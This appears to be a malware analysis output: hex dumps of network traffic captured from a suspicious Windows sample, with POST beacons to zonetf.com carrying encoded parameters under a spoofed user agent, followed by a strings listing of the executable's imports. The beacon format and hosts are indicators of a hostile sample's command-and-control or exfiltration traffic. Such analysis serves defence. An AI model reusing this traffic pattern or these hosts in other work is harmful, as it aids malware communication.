0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a794568 25324234   ose......yEh%2B4
0x00000160 (00352)   48504b52 49307225 32464859 5732396d   HPKRI0r%2FHYW29m
0x00000170 (00368)   654c3637 36704e39 48476b75 52563042   eL676pN9HGkuRV0B
0x00000180 (00384)   4f396273 724c4525 32424c6a 4d7a4e39   O9bsrLE%2BLjMzN9
0x00000190 (00400)   6a474f4f 30477744 49735a31 6e732532   jGOO0GwDIsZ1ns%2
0x000001a0 (00416)   4261424b 68344e76 59677738 52596765   BaBKh4NvYgw8RYge
0x000001b0 (00432)   545a4a6a 4736774c 3274576a 5570664f   TZJjG6wL2tWjUpfO
0x000001c0 (00448)   2532426e 7a6c2532 46526c42 61345356   %2Bnzl%2FRlBa4SV
0x000001d0 (00464)   44464d42 7679346c 4e35317a 564e2532   DFMBvy4lN51zVN%2
0x000001e0 (00480)   464a414a 5339586d 53357877 714a3437   FJAJS9XmS5xwqJ47
0x000001f0 (00496)   30797253 5a477077 3531737a 4d6d554e   0yrSZGpw51szMmUN
0x00000200 (00512)   4b476d39 4a675539 6c762532 42396c77   KGm9JgU9lv%2B9lw
0x00000210 (00528)   36526336 516d4d53 4a375337 714f2532   6Rc6QmMSJ7S7qO%2
0x00000220 (00544)   424c3755 42454e73 4d673657 32757667   BL7UBENsMg6W2uvg
0x00000230 (00560)   65646f69 53573772 77515937 4c65507a   edoiSW7rwQY7LePz
0x00000240 (00576)   524c534a 716f3941 6a6c5459 4c664c43   RLSJqo9AjlTYLfLC
0x00000250 (00592)   64354c57 67757a49 4d6c645a 75476a4b   d5LWguzIMldZuGjK
0x00000260 (00608)   4e4e6957 4f642532 42675657 6e727470   NNiWOd%2BgVWnrtp
0x00000270 (00624)   614a7172 71574e70 416c6e20 48545450   aJqrqWNpAln HTTP
0x00000280 (00640)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000290 (00656)   3a20636c 6f73650d 0a486f73 743a2077   : close..Host: w
0x000002a0 (00672)   77772e69 6e746572 6e657473 65637572   ww.internetsecur
0x000002b0 (00688)   652e636f 6d0d0a41 63636570 743a202a   e.com..Accept: *
0x000002c0 (00704)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000002d0 (00720)   69616d78 2f332e31 310d0a0d 0a         iamx/3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a32 20202066 6a454933   ose....2   fjEI3
0x00000160 (00352)   6f49394f 3932735a 5825320a            oI9O92sZX%2.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a794568 25324234   close....yEh%2B4
0x00000160 (00352)   48504b52 49307225 32464859 5732396d   HPKRI0r%2FHYW29m
0x00000170 (00368)   654c3637 36704e39 48476b75 52563042   eL676pN9HGkuRV0B
0x00000180 (00384)   4f396273 724c4525 32424c6a 4d7a4e39   O9bsrLE%2BLjMzN9
0x00000190 (00400)   6a474f4f 30477744 49735a31 6e732532   jGOO0GwDIsZ1ns%2
0x000001a0 (00416)   4261424b 68344e76 59677738 52596765   BaBKh4NvYgw8RYge
0x000001b0 (00432)   545a4a6a 4736774c 3274576a 5570664f   TZJjG6wL2tWjUpfO
0x000001c0 (00448)   2532426e 7a6c2532 46526c42 61345356   %2Bnzl%2FRlBa4SV
0x000001d0 (00464)   44464d42 7679346c 4e35317a 564e2532   DFMBvy4lN51zVN%2
0x000001e0 (00480)   464a414a 5339586d 53357877 714a3437   FJAJS9XmS5xwqJ47
0x000001f0 (00496)   30797253 5a477077 3531737a 4d6d554e   0yrSZGpw51szMmUN
0x00000200 (00512)   4b476d39 4a675539 6c762532 42396c77   KGm9JgU9lv%2B9lw
0x00000210 (00528)   36526336 516d4d53 4a375337 714f2532   6Rc6QmMSJ7S7qO%2
0x00000220 (00544)   424c3755 42454e73 4d673657 32757667   BL7UBENsMg6W2uvg
0x00000230 (00560)   65646f69 53573772 77515937 4c65507a   edoiSW7rwQY7LePz
0x00000240 (00576)   524c534a 716f3941 6a6c5459 4c664c43   RLSJqo9AjlTYLfLC
0x00000250 (00592)   64354c57 67757a49 4d6c645a 75476a4b   d5LWguzIMldZuGjK
0x00000260 (00608)   4e4e6957 4f642532 42675657 6e727470   NNiWOd%2BgVWnrtp
0x00000270 (00624)   614a7172 71574e70 416c6e20 48545450   aJqrqWNpAln HTTP
0x00000280 (00640)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000290 (00656)   3a20636c 6f73650d 0a486f73 743a2077   : close..Host: w
0x000002a0 (00672)   77772e69 6e746572 6e657473 65637572   ww.internetsecur
0x000002b0 (00688)   652e636f 6d0d0a41 63636570 743a202a   e.com..Accept: *
0x000002c0 (00704)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000002d0 (00720)   69616d78 2f332e31 310d0a0d 0a         iamx/3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a32 20202066 6a454933   .......2   fjEI3
0x00000160 (00352)   6f49394f 3932735a 5825320a            oI9O92sZX%2.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a794568 25324234   ose......yEh%2B4
0x00000160 (00352)   48504b52 49307225 32464859 5732396d   HPKRI0r%2FHYW29m
0x00000170 (00368)   654c3637 36704e39 48476b75 52563042   eL676pN9HGkuRV0B
0x00000180 (00384)   4f396273 724c4525 32424c6a 4d7a4e39   O9bsrLE%2BLjMzN9
0x00000190 (00400)   6a474f4f 30477744 49735a31 6e732532   jGOO0GwDIsZ1ns%2
0x000001a0 (00416)   4261424b 68344e76 59677738 52596765   BaBKh4NvYgw8RYge
0x000001b0 (00432)   545a4a6a 4736774c 3274576a 5570664f   TZJjG6wL2tWjUpfO
0x000001c0 (00448)   2532426e 7a6c2532 46526c42 61345356   %2Bnzl%2FRlBa4SV
0x000001d0 (00464)   44464d42 7679346c 4e35317a 564e2532   DFMBvy4lN51zVN%2
0x000001e0 (00480)   464a414a 5339586d 53357877 714a3437   FJAJS9XmS5xwqJ47
0x000001f0 (00496)   30797253 5a477077 3531737a 4d6d554e   0yrSZGpw51szMmUN
0x00000200 (00512)   4b476d39 4a675539 6c762532 42396c77   KGm9JgU9lv%2B9lw
0x00000210 (00528)   36526336 516d4d53 4a375337 714f2532   6Rc6QmMSJ7S7qO%2
0x00000220 (00544)   424c3755 42454e73 4d673657 32757667   BL7UBENsMg6W2uvg
0x00000230 (00560)   65646f69 53573772 77515937 4c65507a   edoiSW7rwQY7LePz
0x00000240 (00576)   524c534a 716f3941 6a6c5459 4c664c43   RLSJqo9AjlTYLfLC
0x00000250 (00592)   64354c57 67757a49 4d6c645a 75476a4b   d5LWguzIMldZuGjK
0x00000260 (00608)   4e4e6957 4f642532 42675657 6e727470   NNiWOd%2BgVWnrtp
0x00000270 (00624)   614a7172 71574e70 416c6e20 48545450   aJqrqWNpAln HTTP
0x00000280 (00640)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000290 (00656)   3a20636c 6f73650d 0a486f73 743a2077   : close..Host: w
0x000002a0 (00672)   77772e69 6e746572 6e657473 65637572   ww.internetsecur
0x000002b0 (00688)   652e636f 6d0d0a41 63636570 743a202a   e.com..Accept: *
0x000002c0 (00704)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000002d0 (00720)   69616d78 2f332e31 310d0a0d 0a         iamx/3.11....


Strings
X.
h
040904b0
1000
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
3[ZMb 
4eC5LT
4*KSOI*
/4o~vR
4|R xQ
57ThLibr
5k;|kO
5	/l{|
5(N.+)
5<WKt3
6+	?~=
6I[:5e
:6m}+!
=[_/7B
7ViM;Ht
8k5*H 
9Q{IDk
9-\Wu 
abwC<$
ADVAPI32.dll
AlphaBlend
B,*zME
CharLowerA
CharNextA
CharUpperA
CloseHandle
CompareStringA
CompareStringW
CreateFileMappingA
CreateFileW
CreateMutexA
CreateSemaphoreA
CreateThread
<@dahg
@.data
DeleteCriticalSection
efsnf8
EnterCriticalSection
EnumResourceNamesW
E$o*W!
eS87V(
ExitProcess
ExitThread
F.h!H@
FileTimeToLocalFileTime
FileTimeToSystemTime
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
GetACP
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentThreadId
GetDiskFreeSpaceExA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileType
GetFullPathNameA
GetFullPathNameW
GetKeyState
GetLastError
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetPriorityClass
GetPrivateProfileStringA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetTempFileNameA
GetTempPathA
GetTempPathW
GetThreadIOPendingFlag
GetThreadPriority
GetTickCount
GetTimeZoneInformation
GetUserDefaultLCID
GI eS%
GlobalAlloc
GlobalFree
GlobalUnlock
G(tU,`FH
h,..9&5_
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HoQK.s
hP.h_D@
i*$8<C
i,D(]D
in9>H.
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
IWi\6!
i@xen5
j=4A22
 j5=B$
JDReY0
/.\{K5
KERNEL32.dll
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadLibraryA
LoadLibraryW
lstrcmpA
lstrcmpW
lstrcpyA
MapViewOfFile
 */MC/
MessageBoxA
M(.h0~@
MSIMG32.dll
MS(yImx
MultiByteToWideChar
:n<hLs
NJ@"zB
nzO+5l$
<OAai>
{{Ou6e
OutputDebugStringA
p1EB%2
PathAddBackslashA
P.h=M@
pMvkKM/
PXDq`q
RaiseException
`.rdata
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseSemaphore
ResetEvent
RN }HR
RtlUnwind
SetEndOfFile
SetEnvironmentVariableA
SetEvent
SetHandleCount
SetLastError
SetPriorityClass
SetStdHandle
SetUnhandledExceptionFilter
s	hAD&9|
SHLWAPI.dll
S>R&nJ
sx0AgG=f
TerminateProcess
TF.h.q@
!This program cannot be run in DOS mode.
\"TL9o^
,Tlkh>
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tLYzlx
TP.hD9@
TransmitCommChar
TransparentBlt
=T<T.h
.?:uh`.h
uhT~=/hM_
UnhandledExceptionFilter
UnmapViewOfFile
!Us6dS
USER32.dll
u~s[L(lD
~Uvfh&U[
*V7&Ex
vmyyqG
vn)D!g
v<V\N*2
WaitForSingleObject
wB6}a0%' a
WideCharToMultiByte
WJ_ItI,#
wPFHEm!&
WriteFile
WritePrivateProfileStringA
wsprintfA
wsprintfW
XVz/w5
*XX&*^E
*yo8NI
[+Y	T&
_yvk?=
)yyj={S
zI5xL3
/	z)j{B4
Zm_8W|